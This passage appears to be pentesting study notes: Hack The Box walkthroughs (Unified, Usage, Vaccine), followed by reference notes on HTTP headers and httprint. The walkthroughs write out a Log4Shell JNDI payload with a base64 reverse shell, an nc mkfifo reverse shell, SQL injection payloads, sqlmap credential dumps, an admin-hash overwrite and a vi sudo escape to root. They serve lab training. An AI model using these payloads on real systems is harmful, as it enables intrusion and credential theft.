Request</h1></body></html>\n|_http-open-proxy: Proxy might be redirecting requests\n8443/tcp open  ssl/nagios-nsca Nagios NSCA\n| http-title: UniFi Network\n|_Requested resource was /manage/account/login?redirect=%2Fmanage\n| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York\n| Subject Alternative Name: DNS:UniFi\n| Issuer: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-12-30T21:37:24\n| Not valid after:  
2024-04-03T21:37:24\n| MD5:   e6be8c035e126827d1fe612ddc76a919\n| SHA-1: 111baa119cca44017cec6e03dc455cfe65f6d829\n| -----BEGIN CERTIFICATE-----\n| MIIDfTCCAmWgAwIBAgIEYc4mlDANBgkqhkiG9w0BAQsFADBrMQswCQYDVQQGEwJV\n

    After visiting https://10.129.96.149:8080/, we are redirected to https://10.129.96.149:8443/manage/account/login

    It's the login panel of a UniFi application, and the version is disclosed: 6.4.54. A quick Google search for \"exploit unifi 6.4.54\" shows that it is affected by the Log4j vulnerability (Log4Shell, CVE-2021-44228).

    To exploit it:

    sudo apt install openjdk-11-jre maven\n\ngit clone https://github.com/veracode-research/rogue-jndi\n\ncd rogue-jndi\n\nmvn package\n\n# Once it's built, base64-encode a reverse shell with the attacker machine IP and listening port\necho 'bash -c bash -i >&/dev/tcp/10.10.14.2/4444 0>&1' | base64\n# This will return: YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK\n\n# Get out of the rogue-jndi folder and run:\njava -jar rogue-jndi/target/RogueJndi-1.1.jar --command \"bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK}|{base64,-d}|{bash,-i}\" --hostname \"10.129.96.149\"\n# In the --command argument, paste your base64-encoded reverse shell\n# --hostname: Victim IP\n

    Now, open a terminal and start a netcat listener on the port you defined in your payload.
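
    For example, matching the port used in the payload above:

    nc -lnvp 4444\n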

    With Burp Suite, capture a login request:

    POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":false,\"strict\":true}\n

    As we can read in the UniFi exploit write-up, the injectable parameter is \"remember\". So we insert our payload there and send the request with Repeater:

    POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":\"${jndi:ldap://10.10.14.2:1389/o=tomcat}\",\"strict\":true}\n

    Once we send that request, our rogue JNDI server will deliver the reverse shell payload:

    And in our terminal with the nc listener we will catch the reverse shell. Upgrade it to a proper TTY with:

    SHELL=/bin/bash script -q /dev/null\nCtrl-Z\nstty raw -echo\nfg\nreset\nxterm\n

    user.txt is under /home/michael/

    ","tags":["walkthrough","log4j","jndi","mongodb"]},{"location":"htb-unified/#privilege-escalation","title":"Privilege escalation","text":"

    Do some basic reconnaissance:

    whoami\nid\ngroups\nsudo -l\nuname -a\n

    We can also inspect /etc/passwd to see other existing services/users.

    cat /etc/passwd

    Results:
    root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nunifi:x:999:999::/home/unifi:/bin/sh\nmongodb:x:101:102::/var/lib/mongodb:/usr/sbin/nologin\n
    After the unifi user, we see a mongodb service. We also know that with UniFi version 6.4.54 we can get access to the administrator panel of the UniFi application and possibly extract the SSH secrets used between the appliances.

    [See mongodb cheat sheet](27017-27018-mongodb.md).

    First, find out on which port the service is running:
    ps aux | grep mongo
    Results: \n
    unifi 67 0.4 4.2 1103744 85568 ? Sl 11:44 0:46 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1\nunifi 5183 0.0 0.0 11468 1108 pts/0 S+ 14:47 0:00 grep mongo
    Port 27117. Let's interact with the MongoDB service using the mongo command-line utility and attempt to extract the administrator password. A quick Google search using the keywords UniFi Default Database shows that the default database name for the UniFi application is ace.

    From the terminal of the victim machine:

    mongo --port 27117 ace --eval \"db.admin.find().forEach(printjson);\"\n# mongo: use the mongo interactive command line\n# --port: indicate the port\n# ace: the default database name\n# --eval: evaluate the given JavaScript expression\n

    And now we have...

    MongoDB shell version v3.6.3\nconnecting to: mongodb://127.0.0.1:27117/ace\nMongoDB server version: 3.6.3\n{\n        \"_id\" : ObjectId(\"61ce278f46e0fb0012d47ee4\"),\n        \"name\" : \"administrator\",\n        \"email\" : \"administrator@unified.htb\",\n        \"x_shadow\" : \"$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.\",\n        \"time_created\" : NumberLong(1640900495),\n        \"last_site_name\" : \"default\",\n        \"ui_settings\" :\n

    The output reveals a user called administrator. Their password hash is located in the x_shadow variable, but in this instance it cannot be cracked with any password-cracking utilities. Instead, we can replace the x_shadow hash with one we create ourselves in order to reset the administrator's password and authenticate to the administrative panel. To do this we can use the mkpasswd command-line utility. The $6$ prefix identifies the hashing algorithm, SHA-512 in this case, so we have to create a hash of the same type.

    mkpasswd -m sha-512 lalala\n

    It returns: $6$bTJCdmWvffwcSm9p$6FHYn1fesp3WjZesRG20dDQ/bp6Vktrq8aLylXvil8tApzFCguM2MEii63Uemf8BE7jBrB5ZcZwes85JpuXPq0

    With that, now we can update the administrator password. From the terminal of the victim's machine:

    mongo --port 27117 ace --eval 'db.admin.update({\"_id\":\nObjectId(\"61ce278f46e0fb0012d47ee4\")},{$set:{\"x_shadow\":\"$6$bTJCdmWvffwcSm9p$6FHYn1fesp3WjZesRG20dDQ/bp6Vktrq8aLylXvil8tApzFCguM2MEii63Uemf8BE7jBrB5ZcZwes85JpuXPq0\"}})'\n# ObjectId is the one that correlates with the administrator one.\n

    Now, in the admin panel from the browser enter the new credentials for administrator.

    When logged into the dashboard, grab ssh credentials for root user from Settings>Site, tab \"Device Authentication\", SSH Authentication.

    With those credentials, access via ssh connection.

    ","tags":["walkthrough","log4j","jndi","mongodb"]},{"location":"htb-usage/","title":"Walkthrough - Usage, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-usage/#about-the-machine","title":"About the machine","text":"data Machine Usage Platform Hackthebox url link OS Linux Difficulty Easy Points 20 ip 10.10.11.18","tags":["walkthrough"]},{"location":"htb-usage/#getting-usertxt-flag","title":"Getting user.txt flag","text":"","tags":["walkthrough"]},{"location":"htb-usage/#enumeration","title":"Enumeration","text":"
    sudo nmap -sV -sC $ip -p-\n

    Results: Port 22 and 80.

    ","tags":["walkthrough"]},{"location":"htb-usage/#browsing-the-app","title":"Browsing the app","text":"

    After browsing to http://10.10.11.18, the page redirects to http://usage.htb, which results in a DNS error.

    I will add that mapping to my hosts resolver file.

    # append the mapping (note: no http:// scheme in hosts entries)\necho \"10.10.11.18    usage.htb\" | sudo tee -a /etc/hosts\n

    The application is simple: a login panel with a \"Remember your password\" link, another link to an admin login panel, and a logout feature. Enumeration also suggests that the Laravel framework is in use.

    After testing the login form and the \"Remember your password\" form, I detect a SQL injection vulnerability in the latter.

    Previously I registered a user lala@lala.com.

    Payloads for manual detection:

    lala@lala.com' AND 1=1;-- -\n

    lala@lala.com' AND 1=2;-- -\n

    Now we know that we have a blind SQL injection using the boolean-based AND technique, so we can use sqlmap with the --technique flag set to BUT (Boolean-based blind, Union query-based, and Time-based blind). We can also save time by using the --dbms flag to indicate that it is a MySQL database:

    sqlmap -r request.txt  -p 'email' --dbms=mysql --level=3 --risk=3 --technique=BUT -v 7 --batch --dbs --dump --threads 3\n\nsqlmap -r request.txt  -p 'email' --dbms=mysql --level=3 --risk=3 --technique=BUT -v 7 --batch -D usage_blog --tables --dump --threads 3\n\nsqlmap -r request.txt  -p 'email' --dbms=mysql --level=3 --risk=3 --technique=BUT -v 7 --batch -D usage_blog -T admin_users --dump --threads 3\n
    ","tags":["walkthrough"]},{"location":"htb-usage/#upload-a-reverse-shell","title":"Upload a reverse shell","text":"

    The admin profile can be edited. The upload feature for the avatar image is vulnerable.

    First, I tried to upload a PHP file, but file extensions are validated client-side.

    Then, I uploaded a PHP reverse shell file with a jpg extension. The file was uploaded, but it was not executed as PHP.

    Finally, I used Burp Suite to intercept the upload of my ivan.jpg file and modified the extension to php during the interception.

    The reverse shell finally worked, but only for a limited period of time: long enough to set up a listener and establish a new, more stable connection with a bash reverse shell:

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.49 4444 >/tmp/f\n

    ","tags":["walkthrough"]},{"location":"htb-usage/#getting-usertxt","title":"Getting user.txt","text":"

    First, I spawned a shell:

    SHELL=/bin/bash script -q /dev/null\n

    and printed out the flag:

    cat /home/dash/user.txt\n
    ","tags":["walkthrough"]},{"location":"htb-usage/#getting-roottxt","title":"Getting root.txt","text":"

    First, I perform lateral movement to the other user present on the machine. For that, I read the /etc/passwd file and run the linpeas.sh script on the machine.

    ","tags":["walkthrough"]},{"location":"htb-usage/#lateral-movement","title":"Lateral movement","text":"

    Enumerate other users with access to a bash terminal:

    grep '/bin/bash$' /etc/passwd\n

    Results:

    root:x:0:0:root:/root:/bin/bash\ndash:x:1000:1000:dash:/home/dash:/bin/bash\nxander:x:1001:1001::/home/xander:/bin/bash\n

    Upload the linpeas script to the victim machine.

    ################\n# On the attacker machine\n################\n# Download the script from the release page (-L follows redirects, -o saves it)\ncurl -L -o linpeas.sh https://github.com/peass-ng/PEASS-ng/releases/download/20240414-ed0a5fac/linpeas.sh\n\n# Copy the file to the root of your apache server\nsudo cp linpeas.sh /var/www/html\n\n# Start your server\nsudo service apache2 start\n# Turn it off once you have served your file\n\n################\n# On the victim machine\n################\n# Download the script from the attacker server\nwget http://attackerIP/linpeas.sh\n\n# Run the script\nchmod +x linpeas.sh\n./linpeas.sh\n

    Some interesting takeaways from the linpeas.sh results:

    ","tags":["walkthrough"]},{"location":"htb-vaccine/","title":"Vaccine - A HackTheBox machine","text":"

    nmap -sC -sV $ip -Pn\n
    Two open ports: 21 and 80

    Also, from the nmap analysis, the FTP service on port 21 allows anonymous sign-in with an empty password:

    ftp $ip\n\n# enter user \"anonymous\" and hit enter when prompted for password\n
    dir\n# listed appears file backup.zip\n\nget *\n

    We try to open the zip file, but it's password-protected, so we crack it with John the Ripper:

    zip2john nameoffile.zip > zip.hashes\ncat zip.hashes\njohn zip.hashes\n# Proceeding with wordlist:/usr/share/john/password.lst\n# 741852963        (backup.zip)    \n\n\n#Unzip file:\nunzip backup.zip\n\n# Echo index file\ncat index.php\n

    Before the HTML code there is a piece of PHP starting the session. The username and password hash are hardcoded there:

    <?php\nsession_start();\n  if(isset($_POST['username']) && isset($_POST['password'])) {\n    if($_POST['username'] === 'admin' && md5($_POST['password']) === \"2cb42f8734ea607eefed3b70af13bbd3\") {\n      $_SESSION['login'] = \"true\";\n      header(\"Location: dashboard.php\");\n    }\n  }\n?>\n

    Using crackstation.net, we find that \"2cb42f8734ea607eefed3b70af13bbd3\" is an MD5 hash and that the actual password is \"qwerty789\".
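
    Alternatively, the hash can be cracked offline; a minimal sketch using hashcat mode 0 (raw MD5) against rockyou:

    hashcat -m 0 2cb42f8734ea607eefed3b70af13bbd3 /usr/share/wordlists/rockyou.txt\n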

    With this, open the browser and enter the username and password. You will be redirected to: http://$ip/dashboard.php

    The search box triggers an error message on the frontend when a single quotation mark (') is entered as input:

     ERROR: unterminated quoted string at or near \"'\" LINE 1: Select * from cars where name ilike '%'%' ^\n

    This points to a SQL injection vulnerability.

    # Ask for backend DBMS\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch      \n\n#---------\n# [11:03:27] [INFO] the back-end DBMS is PostgreSQL\n#web server operating system: Linux Ubuntu 20.04 or 20.10 or 19.10 (eoan or focal)\n#web application technology: Apache 2.4.41\n#back-end DBMS: PostgreSQL\n\n\n\n# Ask for databases\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch --dbs\n\n# ------\n# [11:06:12] [INFO] fetching database (schema) names available databases [3]:\n# [*] information_schema\n# [*] pg_catalog\n# [*] public\n\n\n\n# Ask for tables in db pg_catalog\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch -D pg_catalog --tables\n\n# Response contains 62 tables. \n\n\n# Ask for users\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch --users \n\n# -----\n# [11:10:16] [INFO] resumed: 'postgres'\n# database management system users [1]:\n# [*] postgres\n\n\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch -D pg_catalog -T pg_user -C passwd,usebypassrls,useconfig,usecreatedb,usename,userepl,usesuper,usesysid,valuntil --dump\n\n\n\n# Ask for passwords\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch --passwords --dump\n\n# -----\n# database management system users password hashes:\n# [*] postgres [1]:\n#    password hash: md52d58e0637ec1e94cdfba3d1c26b67d01\n

    The first three characters (md5) hint at the hashing algorithm. Using https://md5.gromweb.com/?md5=2d58e0637ec1e94cdfba3d1c26b67d01 we obtain: the MD5 hash 2d58e0637ec1e94cdfba3d1c26b67d01 was successfully reversed into the string P@s5w0rd!postgres. Since PostgreSQL computes these hashes over password + username, the actual password is P@s5w0rd!.

    Now, since port 5432 (PostgreSQL) is not exposed externally, we will use SSH port forwarding.

    ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432\n# We listen for incoming connections on our local port 1234. When a client connects to it, the SSH client forwards the connection through the tunnel to port 5432 on the remote server. This lets the local client access the remote service as if it were running on the local machine.\n# We are forwarding traffic from a local port of our choice, for instance 1234, to the port PostgreSQL is listening on, namely 5432, on the remote server. We therefore specify port 1234 to the left of localhost, and 5432 to the right, indicating the target port.\n\nssh postgres@10.129.95.174 -L 1234:localhost:5432\n
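
    Once the tunnel is up, the database is also reachable through the local port; a sketch, assuming the psql client is installed on the attacker machine:

    psql -h localhost -p 1234 -U postgres\n# password: P@s5w0rd!\n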

    After this, we can \"cat\" the user.txt file.

    To escalate privileges, first run some basic reconnaissance commands:

    whoami\nid\nsudo -l\n

    The last one provides interesting output:

    User postgres may run the following commands on vaccine:\n    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf\n

    We can abuse this sudo rule (vi can spawn a shell, see GTFOBins) to gain root access:

     sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf\n:set shell=/bin/sh\n:shell\n

    Once there, print out root flag:

    cat /root/root.txt\n
    ","tags":["walkthrough"]},{"location":"http-headers/","title":"HTTP headers","text":"Tools
    • Curl

    HTTP (Hypertext Transfer Protocol) is a stateless application layer protocol used for the transmission of resources like web application data and runs on top of TCP.

    It was specifically designed for communication between web browsers and web servers.

    HTTP utilizes the typical client-server architecture for communication, whereby the browser is the client, and the web server is the server.

    Resources are uniquely identified with a URL/URI.

    HTTP has three main versions: HTTP/1.0, HTTP/1.1, and HTTP/2, with HTTP/3 on its way.

    • HTTP/1.1 is the most widely used version of HTTP and has several advantages over HTTP/1.0, such as the ability to re-use the same TCP connection, taking advantage of the three-way handshake already performed, and to request multiple URIs/resources over that connection.
    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#structure-of-a-http-request","title":"Structure of a HTTP request","text":"

    Request Line: The request line is the first line of an HTTP request and contains the following three components:

    HTTP method (e.g., GET, POST, PUT, DELETE, etc.): Indicates the type of request being made.\nURL (Uniform Resource Locator): The address of the resource the client wants to access.\nHTTP version: The version of the HTTP protocol being used (e.g., HTTP/1.1).\n

    Request Headers: they provide additional information about the request. Common headers include:

    User-Agent: Information about the client making the request (e.g., browser type).\nHost: The hostname of the server.\nAccept: The media types the client can handle in the response (e.g., HTML, JSON).\nAuthorization: Credentials for authentication, if required.\nCookie: Information stored on the client-side and sent back to the server with each request.\n
    GET /home/ HTTP/2\nHost: site.com\nCookie: session=cookie-value-00000-00000\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nDnt: 1\nSec-Gpc: 1\n

    Request Body (Optional): Some HTTP methods (like POST or PUT) include a request body where data is sent to the server, typically in JSON or form data format.

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#http-verbs-or-methods","title":"HTTP verbs (or methods)","text":"","tags":["pentesting HTTP headers"]},{"location":"http-headers/#structure-of-a-http-response","title":"Structure of a HTTP response","text":"

    Response headers: Similar to request headers, response headers provide additional information about the response. Common headers include:

    Content-Type: The media type of the response content (e.g., text/html, application/json).\nContent-Length: The size of the response body in bytes.\nSet-Cookie: Used to set cookies on the client-side for subsequent requests.\nCache-Control: Directives for caching behavior.\n

    Response Body (Optional): The response body contains the actual content of the response. For example, in the case of an HTML page, the response body will contain the HTML markup.

    In response to the HTTP request, the web server replies with the requested resource, preceded by a set of HTTP response headers. These response headers are used by your web browser to interpret the content contained in the response body.

    An example:

    HTTP/1.1 200 OK\nDate: Fri, 13 Mar 2015 11:26:05 GMT\nCache-Control: private, max-age=0\nContent-Type: text/html; charset=UTF-8\nContent-Encoding: gzip\nServer: gws\nContent-Length: 258\n
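
    Response headers like these can be inspected with a HEAD request, for example:

    curl -I https://www.google.com\n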
    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#date-header","title":"Date header","text":"

    The \"Date\" header in an HTTP response is used to indicate the date and time when the response was generated by the server. It helps clients and intermediaries to understand the freshness of the response and to synchronize the time between the server and the client. This is used in a blind SQLinjection, to see how long it takes for the server to respond.

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#status-code","title":"Status code","text":"

    The status codes can be summarized in the following chart:

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#content-type","title":"Content-Type","text":"

    The \"Content-Type\" header in an HTTP response is used to indicate the media type of the response content. It tells the client what type of data the server is sending so that the client can handle it appropriately.

    List of all content-type headers

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#cache-control","title":"Cache-control","text":"

    Cache-Control is a header used to specify caching policies for browsers and other caching services. Specifically, the Cache-Control HTTP header field holds directives (instructions), in both requests and responses, that control caching in browsers and shared caches (e.g. proxies, CDNs).

    Why is this configuration considered safe? Cache-control: no-store, no-cache, max-age=0.
    • The max-age=N response directive indicates that the response remains fresh until N seconds after the response is generated.
    • The no-cache response directive indicates that the response can be stored in caches, but it must be validated with the origin server before each reuse, even when the cache is disconnected from the origin server.
    • The no-store response directive indicates that caches of any kind (private or shared) should not store this response.

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#server-header","title":"Server header","text":"

    The Server header displays the Web Server banner, for example, Apache, Nginx, IIS etc. Google uses a custom web server banner: gws (Google Web Server).

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#set-cookie","title":"Set-Cookie","text":"

    From geeksforgeeks: \"The\u00a0HTTP header Set-Cookie\u00a0is a response header and used to send cookies from the server to the user agent. So the user agent can send them back to the server later so the server can detect the user.\"

    # The cookie name have to avoid this character ( ) @, ; : \\ \u201d / [ ] ? = { } plus control characters, spaces, and tabs. It can be any US-ASCII characters.\nSet-Cookie: <cookie-name>=<cookie-value>\n\n# This directive defines the host where the cookie will be sent. It is an optional directive.\nSet-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>\n\n# It is an optional directive that contains the expiry date of the cookie.\nSet-Cookie: <cookie-name>=<cookie-value>; Expires=<date>\n\n# Forbids JavaScript from accessing the cookie, for example, through the\u00a0`Document.cookie`\u00a0property. Note that a cookie that has been created with\u00a0`HttpOnly`\u00a0will still be sent with JavaScript-initiated requests, for example, when calling\u00a0`XMLHttpRequest.send()`\u00a0or\u00a0`fetch()`. This mitigates attacks against cross-site scripting XSS.\nSet-Cookie: <cookie-name>=<cookie-value>; HttpOnly\n\n# It contains the life span in a digit of seconds format, zero or negative value will make the cookie expired immediately.\nSet-Cookie: <cookie-name>=<cookie-value>; Max-Age=<number>\n\nSet-Cookie: <cookie-name>=<cookie-value>; Partitioned\n\n# This directive define a path that must exist in the requested URL, else the browser can\u2019t send the cookie header.\nSet-Cookie: <cookie-name>=<cookie-value>; Path=<path-value>\n\nSet-Cookie: <cookie-name>=<cookie-value>; Secure\n\n# This directives providing some protection against cross-site request forgery attacks.\n# Strict means that the browser sends the cookie only for same-site requests, that is, requests originating from the same site that set the cookie. If a request originates from a different domain or scheme (even with the same domain), no cookies with the\u00a0`SameSite=Strict`\u00a0attribute are sent.\n\nSet-Cookie: <cookie-name>=<cookie-value>; SameSite=Strict\n\n# Lax means that the cookie is not sent on cross-site requests, such as on requests to load images or frames, but is sent when a user is navigating to the origin site from an external site (for example, when following a link). This is the default behavior if the\u00a0`SameSite`\u00a0attribute is not specified.\n\nSet-Cookie: <cookie-name>=<cookie-value>; SameSite=Lax\n\n# means that the browser sends the cookie with both cross-site and same-site requests. The\u00a0`Secure`\u00a0attribute must also be set when setting this value, like so\u00a0`SameSite=None; Secure`\n\nSet-Cookie: <cookie-name>=<cookie-value>; SameSite=None; Secure\n\n// Multiple attributes are also possible, for example:\nSet-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>; Secure; HttpOnly\n
    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#understanding-samesite-attribute","title":"Understanding SameSite attribute","text":"

    Differences between SameSite and SameOrigin: we will use the URL\u00a0http://www.example.org\u00a0 to see the differences more clearly.

    | URL | Description | same-site | same-origin |
    | --- | --- | --- | --- |
    | http://www.example.org | Identical URL | ✅ | ✅ |
    | http://www.example.org:80 | Identical URL (implicit port) | ✅ | ✅ |
    | http://www.example.org:8080 | Different port | ✅ | ❌ |
    | http://sub.example.org | Different subdomain | ✅ | ❌ |
    | https://www.example.org | Different scheme | ❌ | ❌ |
    | http://www.example.evil | Different TLD | ❌ | ❌ |

    When thinking about\u00a0SameSite\u00a0cookies, we're only thinking about \"same-site\" or \"cross-site\".

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#cors-cross-origin-resource-sharing","title":"CORS - Cross-Origin Resource Sharing","text":"

    Cross-Origin Resource Sharing\u00a0(CORS) is an\u00a0HTTP-header based mechanism that allows a server to indicate any\u00a0origins\u00a0(domain, scheme, or port) other than its own from which a browser should permit loading resources.

    For security reasons, browsers restrict cross-origin HTTP requests initiated from scripts.

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#x-xss-protection","title":"X-XSS-Protection","text":"

    The HTTP\u00a0X-XSS-Protection\u00a0response header is a feature of Internet Explorer, Chrome and Safari that stops pages from loading when they detect reflected cross-site scripting XSS attacks.

    Syntax

    # Disables XSS filtering.\nX-XSS-Protection: 0\n\n# Enables XSS filtering (usually default in browsers). If a cross-site scripting attack is detected, the browser will sanitize the page (remove the unsafe parts).\nX-XSS-Protection: 1\n\n# Enables XSS filtering. Rather than sanitizing the page, the browser will prevent rendering of the page if an attack is detected.\nX-XSS-Protection: 1; mode=block\n\n# Enables XSS filtering. If a cross-site scripting attack is detected, the browser will sanitize the page and report the violation. This uses the functionality of the CSP report-uri\u00a0directive to send a report.\nX-XSS-Protection: 1; report=<reporting-uri>\n
    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#strict-transport-security","title":"Strict-Transport-Security","text":"

    The HTTP Strict-Transport-Security response header (often abbreviated as HSTS) informs browsers that the site should only be accessed using HTTPS, and that any future attempts to access it using HTTP should automatically be converted to HTTPS.

    Directives

    # The time, in seconds, that the browser should remember that a site is only to be accessed using HTTPS.\nmax-age=<expire-time>\n\n# If this optional parameter is specified, this rule applies to all of the site's subdomains as well.\nincludeSubDomains \n

    Example:

    Strict-Transport-Security: max-age=31536000; includeSubDomains\n

    Additionally, Google maintains an HSTS preload service (used also by Firefox and Safari). By following the guidelines and successfully submitting your domain, you can ensure that browsers will connect to your domain only via secure connections. While the service is hosted by Google, all browsers are using this preload list. However, it is not part of the HSTS specification and should not be treated as official. Directive for the preload service is:

    # When using preload, the max-age directive must be at least 31536000 (1 year), and the includeSubDomains directive must be present.\npreload\n

    Sending the\u00a0preload\u00a0directive from your site can have\u00a0PERMANENT CONSEQUENCES\u00a0and prevent users from accessing your site and any of its subdomains if you find you need to switch back to HTTP.

    What OWASP says about HSTS response header.

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#exploitation","title":"Exploitation","text":"

    Site owners can use HSTS to identify users without cookies. This can lead to a significant privacy leak. Take a look\u00a0here\u00a0for more details.

    Cookies can be manipulated from sub-domains, so omitting the\u00a0includeSubDomains\u00a0option permits a broad range of cookie-related attacks that HSTS would otherwise prevent by requiring a valid certificate for a subdomain. Ensuring the\u00a0secure\u00a0flag is set on all cookies will also prevent, some, but not all, of the same attacks.

    So... basically HSTS addresses the following threats:

    • User bookmarks or manually types\u00a0http://example.com\u00a0and is subject to a man-in-the-middle attacker: HSTS automatically redirects HTTP requests to HTTPS for the target domain.
    • Web application that is intended to be purely HTTPS inadvertently contains HTTP links or serves content over HTTP: HSTS automatically redirects HTTP requests to HTTPS for the target domain
    • A man-in-the-middle attacker attempts to intercept traffic from a victim user using an invalid certificate and hopes the user will accept the bad certificate: HSTS does not allow a user to override the invalid certificate message
    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#https","title":"HTTPS","text":"

    HTTPS (Hypertext Transfer Protocol Secure) is a secure version of the HTTP protocol, which is used to transmit data between a user's web browser and a website or web application.

    HTTPS provides an added layer of security by encrypting the data transmitted over the internet, making it more secure and protecting it from unauthorized access and interception.

    HTTPS is also commonly referred to as HTTP Secure. HTTPS is the preferred way to use and configure HTTP and involves running HTTP over SSL/TLS.

    SSL (Secure Sockets Layer) and TLS (Transport Layer Security) are cryptographic protocols used to provide secure communication over a computer network, most commonly the internet. They are essential for establishing a secure and encrypted connection between a user's web browser or application and a web server.

    HTTPS does not protect against web application flaws! Attacks like XSS and SQLi will still work regardless of the use of SSL/TLS.

    The added encryption layer only protects data exchanged between the client and the server and does not stop attacks against the web application itself.

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#tools","title":"Tools","text":"","tags":["pentesting HTTP headers"]},{"location":"http-headers/#security-headers","title":"Security Headers","text":"
    • https://securityheaders.com/
    ","tags":["pentesting HTTP headers"]},{"location":"httprint/","title":"httprint - A web server fingerprinting tool","text":"

    httprint is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may have been obfuscated by changing the server banner strings, or by plug-ins such as mod_security or servermask.

    httprint can also be used to detect web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc.

    httprint -P0 -h <target hosts> -s <signature file>\n# -P0 for avoiding pinging the host\n# -h target host\n# -s set the signature file to use\n
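
    For example (the target IP and the signature-file path are placeholders; the path varies by installation):

    httprint -P0 -h 192.168.1.1 -s signatures.txt\n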
